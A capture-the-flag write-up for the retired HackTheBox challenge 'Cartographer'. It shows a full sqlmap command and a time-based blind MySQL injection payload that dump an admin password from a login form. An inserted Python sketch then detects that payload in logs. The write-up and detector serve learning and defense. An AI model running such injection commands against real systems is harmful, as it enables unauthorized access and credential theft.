Note to fellow-HTBers: Only write-ups of retired HTB machines or challenges are allowed.

Challenge info

Cartographer [by Arrexel]
Some underground hackers are developing a new command and control server. Can you break in and see what they are up to?

The Challenge

Visiting the web page, we see a login form.

Cartographer login form

Some testing with sqlmap reveals that the login form is vulnerable to SQL injection; the DBMS is MySQL.
Eventually I find that the cartographer database is the one holding the interesting data.

$ sqlmap -u -p username,password --data="username=user&password=pass" --dbms=MySQL --level=5 --risk=3 --predict-output --skip="privileges" -D cartographer --exclude-sysdbs --dump

sqlmap identified the following injection point(s) with a total of 143 HTTP(s) requests:
Parameter: username (POST)
  Type: time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
  Payload: username=user' AND (SELECT 3085 FROM (SELECT(SLEEP(5)))IYFO) AND 'ECrZ'='ECrZ&password=pass
[... skipped for brevity ...]
[15:41:00] [INFO] fetching tables for databases: 'cartographer, information_schema, mysql, performance_schema, sys'
[15:50:10] [INFO] fetching columns for table 'users' in database 'cartographer'
[15:50:10] [INFO] retrieved: username
[15:50:39] [INFO] retrieved: password
[15:51:09] [INFO] fetching entries for table 'users' in database 'cartographer'
Database: cartographer
Table: users
[1 entry]
| username | password                     |
| admin    | mypasswordisfuckinawesome123 |
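A detection-side sketch, added here and not part of the original write-up: the time-based payload sqlmap reported above is fed through a small log analyser that flags the two signals a blind, time-based injection leaves in an application log, SQL tokens in the username field and an abnormal response latency. The log format, the sample lines and the 500 ms baseline are constructed for the example.

```python
import re

# Constructed application log lines (not from the challenge host). The second
# line carries the payload sqlmap reported in the write-up; its duration
# reflects the SLEEP(5) that the injected subquery triggers on the server.
SAMPLE_LOG = """\
15:40:58 POST /index.php username="admin" status=302 duration_ms=41
15:41:00 POST /index.php username="user' AND (SELECT 3085 FROM (SELECT(SLEEP(5)))IYFO) AND 'ECrZ'='ECrZ" status=200 duration_ms=5043
15:41:07 POST /index.php username="user" status=200 duration_ms=38
15:41:09 POST /index.php username="o'brien" status=200 duration_ms=40
"""

LINE_RE = re.compile(r'^(?P<ts>\S+) POST (?P<path>\S+) username="(?P<user>.*)" '
                     r'status=(?P<status>\d+) duration_ms=(?P<ms>\d+)$')

# Markers typical of blind SQL injection in a string parameter: a quote that
# closes the literal followed by a boolean operator, or a deliberate delay call.
# A lone apostrophe in a legitimate name (o'brien) does not match.
INJECTION_RE = re.compile(r"'\s*(AND|OR)\b|\b(SLEEP|BENCHMARK)\s*\(", re.IGNORECASE)

def analyze_line(line, baseline_ms=500):
    """Return the reasons a login attempt looks like blind SQLi (empty list if clean)."""
    m = LINE_RE.match(line)
    if not m:
        return []
    reasons = []
    if INJECTION_RE.search(m.group("user")):
        reasons.append("sql tokens in username")
    # Time-based blind injection shows up as latency far above the normal login cost.
    if int(m.group("ms")) > baseline_ms:
        reasons.append("response latency %s ms exceeds baseline" % m.group("ms"))
    return reasons

def find_suspicious(log_text, baseline_ms=500):
    """Map each flagged username to the reasons it was flagged."""
    hits = {}
    for line in log_text.splitlines():
        reasons = analyze_line(line, baseline_ms)
        if reasons:
            hits[LINE_RE.match(line).group("user")] = reasons
    return hits

if __name__ == "__main__":
    for user, reasons in find_suspicious(SAMPLE_LOG).items():
        print(user, "->", "; ".join(reasons))
```

Either signal alone is worth an alert; both together on the login endpoint are the fingerprint of the scan shown above.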

With these credentials, we attempt to log in on the web page.

The credentials work, and we are redirected to:

Page content after login

Attempting to brute-force the info parameter didn't get me much further, nor did attempting any SQL injection or path traversal.

In the end I sought some inspiration on the forums, where it was hinted that I should try entering the thing I was looking for: the flag!

The flag

Visiting finally reveals the treasure/flag: